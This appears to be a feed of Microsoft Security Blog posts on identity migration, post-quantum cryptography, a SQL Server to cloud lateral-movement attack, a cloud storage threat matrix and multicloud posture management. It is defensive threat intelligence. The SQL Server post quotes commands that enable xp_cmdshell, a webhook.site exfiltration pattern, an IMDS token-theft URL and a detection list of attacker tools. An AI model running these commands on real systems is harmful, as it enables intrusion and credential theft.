Addressing IAM issues is one of the most pressing issues in a merger and acquisition scenario. Typically, other operational issues such as application workloads can continue to operate in their status quo indefinitely until such time as it makes sense to address them. The cybersecurity implications of user access, however, are immediate and need to be addressed quickly, whether this be through some sort of identity consolidation, or through a higher-level abstraction encompassing the existing systems.

One factor that makes a migration complex is the tendency for applications to be tightly coupled with their current identity provider (IdP). When creating an application, developers and app owners may end up writing code that is very specific to their current IdP. Switching that IdP is seldom trivial, especially for long-lived applications that may have been written against a now-legacy protocol, or may have “rolled their own” authentication and authorization. Very often this calls for a complete rewrite of the application; an onerous task that is particularly daunting years or decades after its inception, when the original app team may be long gone.

This makes the common natural approach of wholesale migration somewhat untenable, especially with the time constraints imposed by governance and regulation. Even disregarding those factors, the sheer expense of refactoring and rewriting a sizable portion of your application library—anything older than about five years is probably using an outdated security profile—is prohibitively expensive.

The end goal in a merger and acquisition scenario is to quickly (and cost effectively) transition to a unified and tractable IAM posture, despite having a mix of user pools, protocols, and applications tightly coupled. Such transitions often need to happen in weeks or months, whereas a wholesale rewrite-and-migration might take years.

Microsoft Entra ID

Safeguard your organization with a cloud identity and access management solution that connects employees, customers, and partners to their apps, devices, and data.

Learn more and try free

Addressing your merger and acquisition challenges with Microsoft Entra ID and Strata Identity

Strata Identity takes a different approach to the challenges of managing disparate identity systems during a merger or acquisition. Instead of focusing on a migration of identities, Strata’s Maverics Identity Orchestration Platform provides an abstraction layer on top of your apps, IdPs, and services to enable you to create your own identity fabric.

The Maverics Platform is composed of individual Orchestrators distributed throughout the target environment. These lightweight Orchestrators can live anywhere within the infrastructure on any operating system within Kubernetes clusters or just on standalone virtual machines. They act as a distributed mesh of control, able to pull identity information from any system—whether that be through directing for authentication or just pulling additional user information for an existing session—and convert identity information into the formats needed and expected by applications.

Importantly, this approach means that existing applications do not need to be refactored or rewritten as part of the identity consolidation process. Any application that cannot be trivially swapped over to a new source of identity information—and, importantly, that isn’t up-to-date on the very latest security practices—is simply harnessed by Maverics. It continues to consume identity information in the way that it has always known and Maverics handles the rest. Sessions that are allowed to flow through to the application have had the Microsoft Entra identity controls applied for both authentication and authorization before the traffic is permitted to reach the application in the first place. Even app owners have their burdens reduced significantly, being needed only for some basic smoke testing during a changeover.

This also allows for a deliberate and calculated roll out of changes to your infrastructure. No more stressful projects with hard cutover dates, with those long all-or-nothing weekend cutovers and the associated frantic testing of every application to make sure everything transitioned smoothly. Using the Maverics platform from Strata allows for measured incremental changes. Cutover a single application, at a time—or even a subset of an application’s users—and test with leisure.

Better yet, if any issues are found the rollback is trivial. Since Maverics is acting as an abstraction layer over the identity process, the swapping between user stores or IdPs is handled in one simple interface. The user is unlikely to notice any impact at all as changes are made—either to migrate to the new identity source or to roll back to the old configuration.

Another benefit of this approach is that user impacting changes can be rolled out with deliberation, giving users a chance to acclimate to any new process. Let’s say, for instance, that as part of your migration you need to add multifactor authentication to a body of users that didn’t use it previously. The identity abstraction layer allows you to notify your users of impending changes, and can even assist in the enrollment of the new security factors.

This abstraction layer lets Maverics serve as the single pane of glass through which you can view the combined identity systems, securely controlling all access while, at the same time, making the incremental updates and changes to move the locus of control from these disparate systems into Microsoft Entra ID.

Strata Identity: The last mile in mergers and acquisitions with Microsoft Entra ID

With Strata’s Maverics Orchestration Platform, mergers and acquisitions don’t have to be a long, risky, and labor-intensive effort. By adding an abstraction layer over the existing identity stacks, Strata makes shifting control of authentication and authorization over to Microsoft Entra ID seamless and simple, regardless of how complex and disjointed the previous implementation might have been. Strata also prevents the nightmare of having to rewrite all your apps, using its ability to harness legacy apps with modern identity protocols to save your team immense time and effort.

About Strata Identity

Strata Identity is a pioneer in Identity Orchestration for multicloud and hybrid cloud. The orchestration recipe-powered Maverics platform enables organizations to integrate and control incompatible identity systems with an identity fabric that does not change the user experience or require rewriting apps. By decoupling applications from identity, Maverics makes it possible to implement modern authentication, like passwordless, and enforce consistent access policies without refactoring apps.

The Maverics platform is available on the Azure Marketplace and is an IP co-sell Benefits Eligible solution.

Learn more

Learn more about Microsoft Entra ID.

To learn more about the Microsoft Intelligent Security Association (MISA), visit our website where you can learn about the MISA program, product integrations, and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.   

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and Twitter (@MSFTSecurity) for the latest news and updates on cybersecurity.

The post How Strata Identity and Microsoft Entra ID solve identity challenges in mergers and acquisitions appeared first on Microsoft Security Blog.

Start your journey with Microsoft towards quantum-safety.

View the questionnaire

We believe the first step every organization should take toward quantum safety is to be aware of the need to organize, plan, and begin an impact assessment. We recommend prioritizing symmetric encryption where applicable and subsequently adopting post-quantum cryptography (PQC) for asymmetric encryption once standardized and approved by relevant setting bodies and governments, as recommended by cybersecurity agencies globally. Furthermore, we are exploring and experimenting with additional classical and quantum security solution layers through internal experiments, POCs, and collaborations with partners. 

Given that preparing for such an objective will be a multi-year and iterative process that requires strategic foresight, it’s crucial for organizations to start investing time in their planning and execution efforts today. Thanks to our extensive experience in quantum engineering and expertise as a service and security provider, we can serve as a trusted partner to navigate this process across industry and government. 

Tomorrow’s quantum computers threaten today’s data 

In our previous blog post, we discussed the limitations of current quantum computers in terms of breaking today’s encryption technology. In parallel, the emergence of scaled quantum computers with specific algorithms—such as Shor’s algorithm—could put public key encryption at risk and compromise sensitive information. 

While it may take at least 1 million qubits for a quantum computer to break certain encryption algorithms using Shor’s algorithm, today’s long-term and sensitive data could already be at risk: bad actors could carry out a “Harvest Now, Decrypt Later” scenario by recording data today and decrypting it later when cryptographically relevant quantum computers become available. Therefore, knowing which data to secure now is a first step on the path to a quantum-safe future.  

Microsoft’s commitment to keeping our customers and partners secure 

Putting our recommendations into practice, we have taken a comprehensive approach to quantum safety. Because quantum will have a material impact on today’s classical encryption of both hardware and software, we’ve invested time and efforts to set cross-company goals and establish accountability at the most senior levels of our organization. This led to the establishment of the Microsoft Quantum Safe Program, which aims to accelerate and advance all quantum-safe efforts across Microsoft from both technical and business perspectives. The program focuses on Microsoft’s transition to quantum safety and the adoption of PQC algorithms across our products, services, and datacenters. Additionally, it aims to assist and empower our customers and partners on their own journey to quantum safety across their processes, priorities, and requirements.  

As the first step and highest priority, we are ensuring the compliance of our existing symmetric key encryption and hash function algorithms. Symmetric algorithms, such as Advanced Encryption Standard (AES), and hash functions, such as Secure Hash Algorithm (SHA), are resilient to quantum attacks, and can therefore still be used in deployed systems. At Microsoft, we are already using protocols based on symmetric encryption, such as Media Access Control Security (MACsec) point-to-point protocol. 

On top of symmetric encryption, we will prioritize PQC algorithms—still in the process of being standardized by global bodies such as the National Institute of Standards and Technology (NIST), International Standards Organization (ISO), and Internet Engineering Task Force (IETF)—to handle future threats where asymmetric encryption is currently used. Today, much of the internet’s data, from e-commerce to Wi-Fi access, is kept secure by public key, or asymmetric key cryptography. Currently used public key algorithms rely on complex mathematical problems considered infeasible for classical computers to break, but that are a perfect task for quantum computers running Shor’s algorithm. This undermines the effectiveness of public key algorithms like RSA and Elliptic Curve Cryptography (ECC), and means that PQC algorithms will need to be deployed quickly once standardized, starting with hybrid encryption schemes in tandem with classical algorithms to accelerate adoption. 

Empowering and collaborating with the global community 

We see the effort to achieve quantum safety as a collaborative effort, and this is why we invest heavily in our ecosystems, global partnerships, and close collaborations with standards-setting bodies, academia, and industry partners alike to foster continuous innovation in the quantum security landscape. The standardization of PQC algorithms, driven by NIST’s efforts, is a key step to achieving PQC compliance.

Because we believe that PQC adoption is the ideal path to follow, we’re collaborating with standard-setting bodies while conducting experiments and assessments to facilitate the adoption of these algorithms across our services and products as needed.  As an example, we are participating in the NIST/NCCoE Migration to PQC to demonstrate vulnerable cryptography detection and drive PQC experiments and integration capabilities. Those efforts, along with our participation in the Open Quantum Safe project, will allow the members to implement and test PQC candidates together, so we can be ready for adoption once the final specs are out.  

Furthermore, as part of our investment to empower and collaborate with the global security community, we co-authored FrodoKEM, a quantum-safe key encapsulation mechanism that has been selected, together with Kyber and Classic McEliece, to be part of the first international ISO standard for PQC (in addition, we are participating as co-editors of the standard). We also recently submitted SQISign, a new quantum-safe signature scheme that we co-authored with several industry and academia partners, to NIST’s call for additional signature schemes. Lastly, we continue to actively participate as founding members of the new post-quantum cryptography coalition by MITRE and will help to drive progress toward a broader understanding of the public adoption of PQC and NIST’s recommendations. 

While we continue to conduct research to further develop state-of-the-art security solutions, we are also exploring the potential of other classical and quantum technologies, such as Quantum Key Distribution (QKD). Holistically, at the core of our mission is a commitment to achieving quantum-safety and ensuring the security of our customers.

Getting started with your PQC transition today  

To support our customers in preparing for and navigating their quantum-safe journey, we offer assistance and guidance: we invite you to start your path with us by filling out this questionnaire. Based on your responses, we can understand your status and priorities, and provide the necessary support, including access to experts.  

As a first step, we recommend starting with a comprehensive planning process and a definition of your organization’s criteria for what constitutes your critical areas and sensitive information, alongside a cryptography inventory and impact assessment of your essential data, code, cryptographic technologies, and the critical services of your organization. This will help you to identify any asymmetric encryption in use that will need to be replaced with the latest PQC standardized algorithms. This process is especially important to identify critical areas and systems that involve or protect sensitive data with a value that extends beyond 10 years and should be prioritized in migrating to PQC. 

By considering which data and code need to be secured now, and which may become less relevant over time, as well as uncovering specific instances where cryptography could be used inappropriately or not ideally, your organization will have a better understanding of where to best mitigate potential risks as a quantum future approaches. This will enable you to confidently make the switch to the latest PQC standardized algorithms and safeguard your sensitive data for years to come. 

Explore CodeQL  

To help, we are contributing to CodeQL: a next-generation program code analysis tool provided by GitHub in collaboration with organizations including NIST and NCCoE. With CodeQL, we are building out a comprehensive set of detections that can empower users to create a complete inventory of all encryption usage within the application layer, helping to produce a cryptographic bill of materials and identify legacy cryptography that requires remediation. This tool can thus help create a cryptography inventory and impact assessment that will drive operational planning and create understanding and clarity around the timeline, resources, and level of risk for which to account.

Try now the Crypto Experience for Resource Estimator  

Furthermore, we recently launched the Crypto Experience for Azure Quantum Resource Estimator. Drawing on published research from Microsoft, this new interactive cryptography experience will show you why a symmetric key could remain safe from quantum attacks, but the current public key is vulnerable. And because it is integrated with Copilot in Azure Quantum, you can use the universal user interface of natural language to ask, learn, and explore more topics within the intersection of quantum computing and cryptography.  

The opportunity to usher in a quantum, and quantum-safe, future is immense. We see how the collective genius of scientists and businesses will revolutionize the building blocks of everyday products to usher in a new era of innovation and growth in many fields. That’s what motivates us at Microsoft to drive new breakthroughs and empower every person and every organization on the planet. Our commitment to our customers, partners, and ecosystem to become quantum-safe and remain secure has never been stronger. We are accountable for having our products and services quantum-resistant and safe and will support and guide our customers through this journey to quantum safety. 

Learn more

• Start your journey with Microsoft towards quantum-safety by filling out this questionnaire. 
• Learn more about our vision of quantum networking.
• Explore the Open Quantum Safe project for prototyping and evaluating quantum-resistant cryptography.
• Visit the Azure Quantum website and check out the Microsoft Quantum Innovator Series webinars.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (formerly known as “Twitter”) (@MSFTSecurity) for the latest news and updates on cybersecurity.

The post Starting your journey to become quantum-safe appeared first on Microsoft Security Blog.

The attack flow we observed initiated multiple Microsoft Defender for SQL alerts that allowed us to identify and analyse the cloud lateral movement technique. The alerts also allowed us to quickly deploy additional protections despite not having visibility of the application that was targeted with the SQL injection vulnerability to access the SQL Server. While our analysis of this attack did not yield any indication that the attackers successfully moved laterally to the cloud resources, we assess that it is important for defenders to be aware of this technique used in SQL Server instances, and what steps to take to mitigate potential attacks.

In this blog post, we elaborate on the attack flow and focus on the main technique that we observed: SQL Server to cloud lateral movement. We will also show how Microsoft Defender for SQL can detect activities related to this type of threat and help responders mitigate such attacks.

Cloud-based lateral movement

As more organizations move to the cloud, we see new types of cloud-based attack techniques that are fundamentally different than the ones that are known from on-premises environments. An example of this is how attackers are finding new vectors to perform lateral movement from certain on-premises environments into cloud resources.

In cloud environments, one of the methods to perform lateral movement is by abusing cloud identities that are bound to the cloud resource. Cloud services like Azure use managed identities for allocating identities to the various cloud resources. Those identities are used for authentication with other cloud resources and services. While managed identities offer advantages in terms of convenience, security, and efficiency, they also come with certain risks that introduce a potential attack vector.

For example, if attackers compromised a VM, they could acquire a token for its attached identity by querying the instance metadata service (IMDS) endpoint. With the managed identity access token, the attackers could perform various malicious operations on the cloud resources that the identity has access to. In the attack we observed, the attackers attempted to perform identity-based lateral movement in an environment where we haven’t seen this technique used before: SQL Server instances.

Known technique, new environment: from SQL Server to cloud

While the attempt to move laterally from the SQL Server instance can be considered new, the attack involved activities common to SQL Server attacks. For example, the initial access vector was a successful SQL injection attack that allowed the attackers to run queries on the SQL Server. The attackers launched numerous SQL statements to gather data about the host, databases, and network configuration. The information that the attackers collected included:

• Databases
• Table names and schema
• Database version
• Network configuration
• Read\write\delete permissions

We assess that it is likely that the application targeted with the SQL injection vulnerability had elevated permissions, thus granting the attackers a similar level of access. The attackers used this elevated permission to turn on the xp_cmdshell command, a method to launch operating system (OS) commands through a SQL query. Since xp_cmdshell is turned off by default to prevent exploitation, the attackers used the permissions they acquired to change the SQL configuration and ran the following commands to turn on xp_cmdshell:

1. “EXEC master..sp_configure ‘SHOW advanced options’,1; “RECONFIGURE WITH OVERRIDE;”
2. “EXEC master..sp_configure ‘xp_cmdshell’, 1; RECONFIGURE WITH OVERRIDE;”
3. “EXEC master..sp_configure ‘SHOW advanced options’,0; RECONFIGURE WITH OVERRIDE;”

After enabling xp_cmdshell, the attackers manually initiated a series of operating system commands to launch the next phases of the attack. By using xp_cmdshell, the attackers were able to operate as if they had a shell on the host.

To collect data, the attackers used simple methods such as reading directories, listing processes, and checking network shares. The attackers downloaded several executables and PowerShell scripts that are encoded and compressed. Most of the attacker’s actions from this point were through PowerShell commands, scripts, and modules.

For persistence, the attackers used a scheduled task to launch a backdoor script. In addition, the attackers tried to get credentials by dumping SAM and SECURITY registry keys.

The attackers used a unique method for data exfiltration: they utilized a publicly accessible service called “webhook.site”. This service functions as a free platform for inspecting, debugging, and receiving incoming HTTP requests and emails. Any request directed to this address is promptly logged. The commands are in this pattern: Command | Out-String ;Invoke-WebRequest -Uri https[:]//webhook.site/G-UID. Utilizing this method for data exfiltration allowed the attackers to operate discreetly when transmitting outgoing traffic, as the selected service can be considered as legitimate.

While looking at the technique used by the attackers to perform lateral movement, we encountered a familiar method implemented in a distinct environment: the attackers tried utilizing the cloud identity of the SQL Server instance by accessing the IMDS and obtaining the cloud identity access key. The IMDS is a RESTful web service that runs on a local IP address (169.254.169[.]254) and provides information about the VM, such as the VM’s region, tags, and the identity token. The identity token is a JSON Web Token (JWT) that contains the claims and the signature of the identity.

The request to IMDS identity’s endpoint returns the security credentials (identity token) for the cloud identity. For example, in Azure this request would look like: hxxp://169.254.169[.]254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/

With the identity token, the attackers can perform various operations on cloud resources that the cloud identity has access to. They can perform lateral movement across the cloud environment, thus getting access to external services. While the attackers in this case were unsuccessful in attempts to take advantage of this technique due to an error, we strongly recommend defenders to apply the best practices we provide in this blog post to protect environments against attacks that may use the same technique.

Conclusion

To summarize, this attack demonstrates the attempt to leverage cloud identities in a SQL Server instance for lateral movement. This is a technique we are familiar with in other cloud services such as VMs and Kubernetes cluster but haven’t seen before in SQL Server instances. We have observed numerous attacks attempting to leverage cloud identities in Kubernetes and are aware of the potential risks and impact that can result from unauthorized access to their identity tokens. Similarly, in SQL Server, cloud identities are also commonly employed and might possess elevated permissions to carry out actions in the cloud. Not properly securing cloud identities can expose SQL Server instances and cloud resources to similar risks. This method provides an opportunity for the attackers to achieve greater impact not only on the SQL Server instances but also on the associated cloud resources.

With the increasing adoption of cloud technology, attackers and threat actors are utilizing known attack techniques in new environments and are becoming more sophisticated. This evolving landscape of cloud-based attack techniques, with lateral movement being one of them, emphasizes the need for organizations to ensure strong defenses and safeguarding of critical assets in the cloud.

This attack also highlights the importance of least privilege practices when designing and deploying cloud-based and on-premises solutions. Attackers are often able to conduct further malicious activities through abusing over-privileged processes, accounts, managed identities, and database connections. In this case, organizations are recommended to ensure that all applications are updated and secured and are given only the necessary permissions and privileges, to avoid putting connected SQL Server instances, as well as other cloud resources, at risk.

Detection

Microsoft Defender for Cloud

The Microsoft Defender for Cloud helps to discover and mitigate potential database vulnerabilities and detects anomalous activities that may be an indication of a threat to SQL databases, SQL Servers on machines, open-source databases, and Azure Cosmos DB through Microsoft Defender for SQL.

The following Defender for SQL alerts might indicate threat activity like the threat described in this blog post:

• Potential SQL injection
• A possible vulnerability to SQL Injection
• SQL Server potentially spawned a Windows command shell and accessed an abnormal external source

As a cloud-based next-generation database protection solution, Defender for SQL is continuously updated with new detection capabilities and can now detect IMDS calls from SQL Server instances, the technique described in this article.

Microsoft Defender for Cloud also features Microsoft Defender for Resource Manager that analyzes Azure control plane operations to find abnormal behavior of cloud identities. This coverage can help find lateral movement activities in your cloud environment.

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alerts might indicate threat activity related to this threat, specifically the use of the xp_cmdshell command. Note, however, that these alerts can also be triggered by unrelated threat activity.

• SQL Server login using xp_cmdshell
• Suspicious SQLCMD activity

Mitigation

The vulnerability assessment solution in Defender for SQL can also detect vulnerabilities and misconfigurations in the database. Mitigating and responding to vulnerabilities reduces the attack surface of the SQL Server and can prevent potential attacks. One of the SQL vulnerability assessment rules involves the enablement of xp_cmdshell, providing a means to identify database instances where this setting is enabled.

With this coverage of the wide aspects of lateral movement in the cloud, and the correlations between them, organizations can strengthen their defenses and safeguard their critical assets from the risk of lateral movement. We also recommend following security best practices for managed identities to prevent lateral movement in the cloud. By implementing those security measures and adhering to the least privilege principle when granting permissions to managed identities, organizations can reduce the attack surface of those identities.

Hunting queries

Microsoft 365 Defender

Microsoft 365 Defender is becoming Microsoft Defender XDR. Learn more.

Microsoft 365 Defender customers can run the following query to find related activity in their networks:

SQL Server abuse

SQL Server offers a vast array of tools for automating tasks, exporting data, and running scripts. These legitimate tools can be repurposed by attackers. Because there are so many powerful commands an attacker might exploit, hunting for malicious activity involving SQL Server can be complicated.

This query detects instances of a SQL Server process launching a shell to run one or more suspicious commands.

let relevantCmdlineTokens = pack_array
("advpack.dll","appvlp.exe","atbroker.exe","bash.exe","bginfo.exe","bitsadmin.exe","cdb.exe","certutil.exe","cl_invocation.ps1","cl_mutexverifiers.ps1","cmstp.exe","Copy-Item","csi.exe","diskshadow.exe","dnscmd.exe","dnx.exe","dxcap.exe","esentutl.exe","expand.exe","extexport.exe","extrac32.exe","findstr.exe","forfiles.exe","ftp.exe","gpscript.exe","hh.exe","ie4uinit.exe","ieadvpack.dll","ieaframe.dll","ieexec.exe","infdefaultinstall.exe", "installutil.exe","Invoke-WebRequest","makecab.exe","manage-bde.wsf","mavinject.exe","mftrace.exe","microsoft.workflow.compiler.exe","mmc.exe","msbuild.exe","msconfig.exe","msdeploy.exe","msdt.exe","mshta.exe","mshtml.dll","msiexec.exe","msxsl.exe","netstat","odbcconf.exe","pcalua.exe","pcwrun.exe","pcwutl.dll","pester.bat","ping","presentationhost.exe","pubprn.vbs","rcsi.exe","regasm.exe","register-cimprovider.exe","regsvcs.exe","regsvr32.exe","replace.exe","rundll32.exe","runonce.exe","runscripthelper.exe","schtasks.exe","scriptrunner.exe","setupapi.dll","shdocvw.dll","shell32.dll","slmgr.vbs","sqltoolsps.exe","syncappvpublishingserver.exe","syncappvpublishingserver.vbs","sysinfo","syssetup.dll","systeminfo","taskkill","te.exe","tracker.exe","url.dll","verclsid.exe","vsjitdebugger.exe","wab.exe","WebClient","wget","whoami","winrm.vbs","wmic.exe","xwizard.exe","zipfldr.dll","certutil");
DeviceProcessEvents 
| where Timestamp >= ago(10d)
| where InitiatingProcessFileName in~ ("sqlservr.exe", "sqlagent.exe", "sqlps.exe", "launchpad.exe")
| summarize DistinctProcessCommandLines = tostring(makeset(ProcessCommandLine)) by DeviceId, bin(Timestamp, 2m)  
| where DistinctProcessCommandLines has_any(relevantCmdlineTokens) 

Microsoft Sentinel

Microsoft Sentinel customers can deploy the Azure SQL solution that allows security analysts and administrators to rapidly deploy a range of detection and hunting queries to their Microsoft Sentinel environment. For instance, the solution’s analytical rules assist in pinpointing unique SQL queries that attempt or succeed in executing commands – such as attempts to execute shell commands, suggestive of potential security risks. Additionally, the hunting queries will highlight instances where potentially risky stored procedures like xp_cmdshell are called upon.

Microsoft Sentinel has a range of detection and threat hunting content that customers can use to detect the activity detailed in this blog:

• Attempts to execute shell command
• Suspicious stored procedures like xp_cmdshell

If the Azure SQL Solution is not currently deployed, Microsoft Sentinel customers can install the solution from the Content Hub to have the rules deployed in their Sentinel workspace. More details on the Content Hub can be found here:  https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy.

Sunders Bruskin, Hagai Ran Kestenberg, Fady Nasereldeen, Cloud researchers in Microsoft Threat Intelligence team

Further reading

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on Twitter at https://twitter.com/MsftSecIntel.

The post Defending new vectors: Threat actors attempt SQL Server to cloud lateral movement appeared first on Microsoft Security Blog.

Cybercriminals target cloud storage accounts and services for numerous purposes, such as accessing and exfiltrating sensitive data, gaining network footholds for lateral movement, enabling access to additional resources, and deploying malware or engaging in extortion schemes. To combat such threats, the updated threat matrix provides better coverage of the attack surface by detailing several new initial access techniques. The matrix further provides visibility into the threat landscape by detailing several novel attacks unique to cloud environments, including some not yet observed in real attacks. The new version of the matrix is available at: https://aka.ms/StorageServicesThreatMatrix

 Of the new techniques detailed in this blog, several noteworthy examples include:

• Object replication – Allows attackers to maliciously misuse the object replication feature in both directions by either using outbound replication to exfiltrate data from a target storage account or using inbound replication to deliver malware to the target account.
• Operations across geo replicas – Helps attackers evade defenses by distributing operations across geographical copies of storage accounts. Security solutions may only have visibility into parts of the attack and may not detect enough activity in a single region to trigger an alert.
• Static website – Allows attackers to exfiltrate data using the “static website” feature, a feature provided by major storage cloud providers that can often be overlooked by less experienced users.

In this blog post, we’ll introduce new attack techniques that have emerged since our last analysis and cover the various stages of a potential attack on cloud storage accounts.

New techniques in the matrix

1. Reconnaissance

Reconnaissance consists of techniques that involve attackers actively or passively gathering information that can be used to support targeting.

DNS/Passive DNS – Attackers may search for DNS data for valid storage account names that can become potential targets. Threat actors can query nameservers using brute-force techniques to enumerate existing storage accounts in the wild, or search through centralized repositories of logged DNS query responses (known as passive DNS).

Victim-owned websites – Attackers may look for storage accounts of a victim enterprise by searching its websites. Victim-owned website pages may be stored on a storage account or contain links to retrieve data stored in a storage account. The links contain the URL of the storage and provide an entry point into the account.

2. Initial access

Initial access consists of techniques that use various entry vectors to gain their initial foothold on a storage account. Once achieved, initial access may allow for continued access, data exfiltration, or lateral movement through a malicious payload that is distributed to other resources.

SFTP credentials – Attackers may obtain and abuse credentials of an SFTP (Secure File Transfer Protocol) account as a means of gaining initial access. SFTP is a prevalent file transfer protocol between a client and a remote service. Once the user connects to the cloud storage service, the user can upload and download blobs and perform other operations that are supported by the protocol. SFTP connections require SFTP accounts, which are managed locally in the storage service instance, including credentials in the form of passwords or key-pairs.

NFS access – Attackers may perform initial access to a storage account using the NFS protocol where enabled. While access is restricted to a list of allowed virtual networks that are configured on the storage account firewall, connection via NFS protocol does not require authentication and can be performed by any source on the specified networks.

SMB access – Attackers may perform initial access to a storage account file shares using the Server Message Block (SMB) protocol.

Object replication – Attackers may set a replication policy between source and destination containers that asynchronously copies objects from source to destination. This feature can be maliciously misused in both directions. Outbound replication can serve as an exfiltration channel of customer data from the victim’s container to the adversary’s container. Inbound replication can be used to deliver malware from an adversary’s container to a victim’s container. After the policy is set, the attacker can operate on their container without accessing the victim container.

3. Persistence

Persistence consists of techniques that attackers use to keep access to the storage account due to changed credentials and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems.

Create SAS Token – Attackers may create a high-privileged SAS token with long expiry to preserve valid credentials for a long period. The tokens are not monitored by storage accounts, thus they cannot be revoked (except Service SAS) and it’s not easy to determine whether there are valid tokens in the wild until they are used.

Container access level property – Attackers may adjust the container access level property at the granularity of a blob or container to permit anonymous read access to data in the storage account. This configuration secures a channel to exfiltrate data even if the initial access technique is no longer valid.

SFTP account – Attackers may create an SFTP account to maintain access to a target storage account. The SFTP account is local on the storage instance and is not subject to Azure RBAC permissions. The account is also unaffected in case of storage account access keys rotation.

Trusted Azure services – Attackers may configure the storage account firewall to allow access by trusted Azure services. Azure Storage provides a predefined list of trusted services. Any resource from that list that belongs to the same subscription as the storage account is allowed by the firewall even if there is no firewall rule that explicitly permits the source address of the resource.

Trusted access based on a managed identity – Attackers may configure the storage account firewall to allow access by specific resource instances based on their system-assigned managed identity, regardless of their source address. The resource type can be chosen from a predefined list provided by Azure Storage, and the resource instance must be in the same tenant as the storage account. The RBAC permissions of the resource instance determine the types of operations that a resource instance can perform on storage account data.

Private endpoint – Attackers may set private endpoints for a storage account to establish a separate communication channel from a target virtual network. The new endpoint is assigned with a private IP address within the virtual network’s address range. All the requests sent to the private endpoint bypass the storage account firewall by design.

4. Defense evasion

The defense evasion tactic consists of techniques that are used by attackers to avoid detection and hide their malicious activity.

Disable audit logs – Attackers may disable storage account audit logs to prevent event tracking and avoid detection. Audit logs provide a detailed record of operations performed on a target storage account and may be used to detect malicious activities. Thus, disabling these logs can leave a resource vulnerable to attacks without being detected.

Disable cloud workload protection – Attackers may disable the cloud workload protection service which raises security alerts upon detection of malicious activities in cloud storage services.

Private endpoint – Attackers may set private endpoints for a storage account to establish a separate communication channel from a target virtual network. The new endpoint is assigned with a private IP address within the virtual network’s address range. All the requests sent to the private endpoint bypass the storage account firewall by design.

Operations across geo replicas – Attackers may split their requests across geo replicas to reduce the footprint in each region and avoid being detected by various rules and heuristics.

5. Credential access

Credential access consists of techniques for stealing credentials like account names and passwords. Using legitimate credentials can give adversaries access to other resources, make them harder to detect, and provide the opportunity to help achieve their goals.

Unsecured communication channel – Attackers may sniff network traffic and capture credentials sent over an insecure protocol. When a storage account is configured to support unencrypted protocol such as HTTP, credentials are passed over the wire unprotected and are susceptible to leakage. The attacker can use the compromised credentials to gain initial access to the storage account.

6. Discovery

Discovery consists of techniques attackers may use to gain knowledge about the service. These techniques help attackers observe the environment and orient themselves before deciding how to act.

Account configuration discovery – Attackers may leverage control plane access permission to retrieve the storage account configuration. The configuration contains various technical details that may assist the attacker in implementing a variety of tactics. For example, firewall configuration provides network access information. Other parameters may reveal whether access operations are logged. The configuration may also contain the backup policy that may assist the attacker in performing data destruction.

7. Exfiltration

Exfiltration consists of techniques that attackers may use to extract data from storage accounts. These may include transferring data to another cloud storage outside of the victim account and may also include putting size limits on the transmission. 

Static website – Attackers may use the “static website” feature to exfiltrate collected data outside of the storage account. Static website is a cloud storage provider hosting capability that enables serving static web content directly from the storage account. The website can be reached via an alternative web endpoint which might be overlooked when restricting access to the storage account. 

Object replication – Attackers may set a replication policy between source and destination containers that asynchronously copies objects from source to destination. Outbound replication can serve as an exfiltration channel of customer data from a victim’s container to an adversary’s container.

Conclusion

As the amount of data stored in the cloud continues to grow, so does the need for robust security measures to protect it. Microsoft Defender for Cloud can help detect and mitigate threats on your storage accounts. Defender for Storage is powered by Microsoft Threat Intelligence and behavior modeling to detect anomalous activities such as sensitive data exfiltration, suspicious access, and malware uploads. With agentless at-scale enablement, security teams are empowered to remediate threats with contextual security alerts, remediation recommendations, and configurable automations. Learn more about Microsoft Defender for Cloud support for storage security.

Evgeny Bogokovsky

Microsoft Threat Intelligence

References

• https://attack.mitre.org/

Further reading

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on Twitter at https://twitter.com/MsftSecIntel.

The post Cloud storage security: What’s new in the threat matrix appeared first on Microsoft Security Blog.

Multicloud and multiplatform deployments increase the potential for security risks and data breaches. Today, many customers are working to secure a complex patchwork of technologies across different devices, applications, platforms, and clouds. Some are also dealing with separate security infrastructures for each cloud they’re operating in, which introduces incredible complexity, creates seams for attackers to exploit, and increases the likelihood of mistakes.

I am excited to share several innovations that improve multicloud visibility and help customers proactively reduce risk and respond to threats in real time. Read on to see how we continue to expand our end-to-end security solution to help organizations defend against threats across all endpoints and clouds.

Microsoft Defender for Cloud

Protect multicloud and hybrid environments with comprehensive security across the full lifecycle, from development to runtime.

Learn more

Extend multicloud visibility to proactively prevent breaches

Today, we’re thrilled to announce new advanced multicloud posture management capabilities for Google Cloud Platform (GCP) in Microsoft Defender for Cloud to help customers proactively prevent data breaches across multicloud and hybrid environments. 

Microsoft is recognized as a Representative Vendor in the 2023 Gartner Market Guide for Cloud Native Application Protection Platforms.³ Microsoft Defender for Cloud became the first cloud provider to offer multicloud workload protection for cloud infrastructure, applications, and data across the full lifecycle for all three public clouds.⁴ Since then, we’ve rapidly expanded our CNAPP capabilities to provide advanced posture management with Microsoft Defender Cloud Security Posture Management (Defender CSPM), DevSecOps security with integrations into GitHub Advanced Security, and continued investments in our cloud workload protection (CWP) solutions across servers, containers, APIs, storage, and databases.

Figure 1. Attack path showing a GCP virtual machine exposed to the internet with permissions to a data store.

